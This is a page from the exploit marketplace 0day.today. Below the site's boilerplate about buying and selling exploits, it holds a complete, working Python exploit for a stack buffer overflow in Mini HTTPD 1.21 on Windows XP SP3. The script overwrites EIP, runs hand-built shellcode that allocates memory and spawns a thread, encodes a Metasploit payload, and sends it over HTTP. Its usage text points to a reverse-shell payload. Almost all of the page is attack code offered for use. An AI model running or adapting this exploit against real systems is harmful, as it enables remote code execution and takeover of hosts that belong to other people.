0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Mini HTTPD 1.21 - Stack Buffer Overflow POST Exploit
#!/usr/bin/python # # Title: Mini HTTPD stack buffer overflow POST exploit # Author: TheColonial # Date: 20 Feb 2013 # Software Link: http://www.vector.co.jp/soft/winnt/net/se275154.html # Vendor Homepage: http://www.picolix.jp/ # Version: 1.21 # Tested on: Windows XP Professional SP3 # # Description: # This is a slightly more weaponised version of the Mini HTTPD buffer overflow # written by Sumit, located here: http://www.exploit-db.com/exploits/31736/ # I wrote this up because the existing version had a hard-coded payload and # didn't work on any of my XP boxes. # # The instability of the existing is down to bad chars, and the parent thread # killing off the child thread when the thing is still running. This exploit # allocates memory in a safe area, copies the payload to it, creates a new # thread which runs the payload and then suspends the current thread. The # suspending of the thread forces the parent to kill it off rather than let # it crash and potentially bring the process down. # # Run the script without arguments to see usage. import struct, socket, sys, subprocess # Helper function that reads the body of files off disk. def file_content(path): with open(path, 'rb') as f: return f.read() # Sent the payload in the correct format to the target host/port. def pwn(host, port, payload): print "[*] Connecting to {0}:{1}...".format(host, port) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) print "[*] Connected, sending payload {0} bytes...".format(len(payload)) payload = "POST /{0} HTTP/1.1\r\nHost: {1}\r\n\r\n".format(payload, host) s.send(payload) s.shutdown s.close print "[+] Payload of {0} bytes sent, hopefully your shellcode executed.".format(len(payload)) # Create the part of the payload creates a thread to run the final payload in. def create_payload_thread(final_payload_size): VirtualAlloc = struct.pack("<L", 0x7c809AE1) # in kernel32 CreateThread = struct.pack("<L", 0x7c8106c7) # in kernel32 SuspendThread = struct.pack("<L", 0x7c83974A) # in kernel32 payload = "" payload += "\x83\xec\x02" # add esp, 0x2 (aligns the stack) payload += "\x89\xe6" # mov esi, esp payload += "\x83\xc6\x00" # add esi, <some offset filled later> count_offset = len(payload) - 1 # zero out ebx because we use zero a lot payload += "\x31\xdb" # xor ebx,ebx # allocate some memory to store our shellcode in which is # away from the current active area and somewhere safe payload += "\x6a\x40" # push 0x40 payload += "\x68\x00\x30\x00\x00" # push 0x3000 payload += "\x68\x00\x10\x00\x00" # push 0x1000 payload += "\x53" # push ebx payload += "\xB8" + VirtualAlloc # mov eax,<address> payload += "\xff\xd0" # call eax # copy the payload over to the newly allocated area size_bin = struct.pack("<L", final_payload_size + 4) payload += "\xb9" + size_bin # mov ecx,final_payload_size payload += "\x89\xc7" # mov edi,eax payload += "\xf2\xa4" # rep movsb # create the thread with a starting address pointing to the # allocated area of memory payload += "\x53" # push ebx payload += "\x53" # push ebx payload += "\x53" # push ebx payload += "\x50" # push eax payload += "\x53" # push ebx payload += "\x53" # push ebx payload += "\xB8" + CreateThread # mov eax,<address> payload += "\xff\xd0" # call eax # We call SuspendThread on the current thread, because this # forces the parent to kill it. The bonus here is that doing # so prevents the thread from dying and bringing the whole # process down. payload += "\x4b" # dec ebx payload += "\x4b" # dec ebx payload += "\x53" # push ebx payload += "\xB8" + SuspendThread # mov eax,<address> payload += "\xff\xd0" # call eax payload += "\x90" * 4 # fill in the correct offset so that we point ESI to the # right location at the start of the final payload size = len(payload) + final_payload_size % 4 print "[*] Final stage is {0} bytes.".format(final_payload_size) offset = struct.pack("B", size) # write the value to the payload at the right location and return return payload[0:count_offset] + offset + payload[count_offset+1:len(payload)] # Creates the first stage of the exploit which overwrite EIP to get control. def create_stage1(): eip_offset = 5412 jmp_esp = struct.pack("<L", 0x7e4456F7) # JMP ESP in advapi32 eip_offset2 = eip_offset + 4 payload = "" payload += "A" * eip_offset # padding to reach EIP overwrite payload += jmp_esp # address to overwrite IP with payload += "\x90" # alignment payload += "\x83\xEC\x21" # rejig ESP return payload # Create encoded shellcode from the given payload. def create_encoded_shellcode(payload): print "[*] Input payload of {0} bytes received. Encoding...".format(len(payload)) params = ['msfencode', '-e', 'x86/opt_sub', '-t', 'raw', 'BufferRegister=ESP', 'BufferOffset=42', 'ValidCharSet=filepath'] encode = subprocess.Popen(params, stdout = subprocess.PIPE, stdin = subprocess.PIPE) shellcode, _ = encode.communicate(payload) print "[*] Shellcode of {0} bytes generated.".format(len(shellcode)) return shellcode print "" print "MiniHTTPd 1.21 exploit for WinXP SP3 - by TheColonial" print "-----------------------------------------------------" print "" print " Note: msfencode must be in the path and Metasploit must be up to date." if len(sys.argv) != 4: print "" print " Usage: {0} <host> <port> <payloadfile>".format(sys.argv[0]) print "" print " host : IP/name of the target host." print " port : Port that the target is running on." print " payloadfile : A file with the raw payload that is to be run." print " This should be the raw, non-encoded output of" print " a call to msfpayload" print "" print " eg. {0} 192.168.1.1 80 reverse_shell_raw.bin" print "" else: print "" print " Make sure you have your listeners running!" print "" host = sys.argv[1] port = int(sys.argv[2]) payload_file = sys.argv[3] stage1 = create_stage1() final_stage = file_content(payload_file) thread_payload = create_payload_thread(len(final_stage)) shellcode = create_encoded_shellcode(thread_payload + final_stage) padding = "A" * 0x10 pwn(host, port, stage1 + shellcode + padding) # 0day.today [2024-12-24] #